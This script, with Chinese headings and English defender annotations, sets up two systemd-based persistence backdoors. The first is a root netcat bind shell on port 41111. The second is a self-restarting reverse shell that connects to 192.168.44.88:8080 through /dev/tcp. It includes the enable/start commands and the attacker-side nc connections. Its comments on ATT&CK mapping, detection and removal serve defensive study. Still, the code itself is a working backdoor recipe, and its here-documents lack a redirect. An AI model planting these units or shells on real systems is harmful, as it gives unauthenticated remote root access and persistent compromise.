系统重启后自动开启 bind shell 后门(通过 systemd 服务实现持久化)

# Defender reference: persistence through a systemd service unit
# (MITRE ATT&CK T1543.002, "Systemd Service").
# The here-document below is the unit text shown for
# /usr/lib/systemd/system/backdoor.service. Its ExecStart line runs
# `nc -l -p 41111 -e /bin/bash`: a listener on TCP 41111 that attaches
# /bin/bash to whoever connects, with no authentication step visible anywhere
# in the unit. No User= is set, so as a system unit it would run as root by
# default. WantedBy=multi-user.target ties the unit to normal boot.
#
# What to look for on a host:
#   - unit files created or modified under /usr/lib/systemd/system or
#     /etc/systemd/system (file-integrity monitoring, or an audit watch such
#     as `auditctl -w /usr/lib/systemd/system -p wa`)
#   - ExecStart lines that call nc with -e, or wrap a command in `bash -c`
#     (`systemctl cat <unit>` prints the definition systemd actually loaded)
#   - an unexpected listener, e.g. `ss -ltnp` showing port 41111
cat /usr/lib/systemd/system/backdoor.service <<EOF
[Unit]
Description=Just a simple backdoor for test
After=network.target
[Service]
Type=forking
ExecStart=bash -c "nc -l -p 41111 -e /bin/bash &"
ExecReload=
ExecStop=
PrivateTmp=true
[Install]
WantedBy=multi-user.target

EOF
# daemon-reload makes systemd re-read its unit files.
systemctl daemon-reload
# `enable` registers the unit with the target named in WantedBy (a symlink in
# that target's .wants directory); that link is what survives a reboot, so it
# is also the artefact to hunt for and remove.
systemctl enable backdoor # enable the unit; the backdoor opens after a reboot
systemctl start backdoor # start the unit; the backdoor opens immediately
# Remediation: `systemctl disable --now backdoor`, delete the unit file, then
# `systemctl daemon-reload`; killing only the nc process leaves the boot-time
# registration in place.

# Client side of the bind shell (presumably run from a second machine): a
# plain TCP connection to 192.168.44.130:41111. On the network this appears as
# an inbound session to a non-standard port, which default-deny ingress
# filtering on the host or perimeter would block.
nc 192.168.44.130 41111

创建类似定时任务的后门(服务退出后由 systemd 按固定间隔自动重启)

# Defender reference: a second systemd-unit persistence variant, this time an
# outbound (reverse) shell instead of a local listener.
# The here-document below is the unit text shown for
# /usr/lib/systemd/system/guard.service. Its ExecStart line references an
# interactive bash whose input and output point at
# /dev/tcp/192.168.44.88/8080, i.e. a connection out to a remote host.
# Restart=always with RestartSec=12s asks systemd to relaunch the service
# 12 seconds after every exit, so the callback repeats on a timer and killing
# the process is not a fix. The innocuous name "guard" is a reminder to review
# units by what they execute, not by what they are called.
#
# What to look for on a host:
#   - enabled units nobody can account for:
#     `systemctl list-unit-files --type=service --state=enabled`
#   - ExecStart lines containing /dev/tcp/ or an interactive shell (`bash -i`)
#   - repeated outbound connection attempts at a fixed interval to one
#     address and port (here 192.168.44.88:8080), and restart loops for the
#     unit in the journal (`journalctl -u guard`)
#   - egress filtering that only permits expected destinations blunts this
#     variant even when the unit is already installed
cat /usr/lib/systemd/system/guard.service <<EOF
[Unit]
Description=guard
After=network.target

[Service]
Type=forking
ExecStart=/bin/bash -i > /dev/tcp/192.168.44.88/8080 0<&1 2>&1
Restart=always
RestartSec=12s

[Install]
WantedBy=default.target

EOF
# daemon-reload makes systemd re-read its unit files.
systemctl daemon-reload
# `enable` registers the unit with default.target (the WantedBy value above),
# which is what makes it start again after a reboot.
systemctl enable guard # enable the unit; the backdoor opens after a reboot
systemctl start guard # start the unit; the backdoor opens immediately
# Remediation: `systemctl disable --now guard`, delete the unit file, then
# `systemctl daemon-reload`; with Restart=always, stopping the process alone
# only buys 12 seconds.

# Receiving end of the reverse connection: a netcat listener on TCP 8080
# (presumably on 192.168.44.88, the address in the unit).
nc -lvvp 8080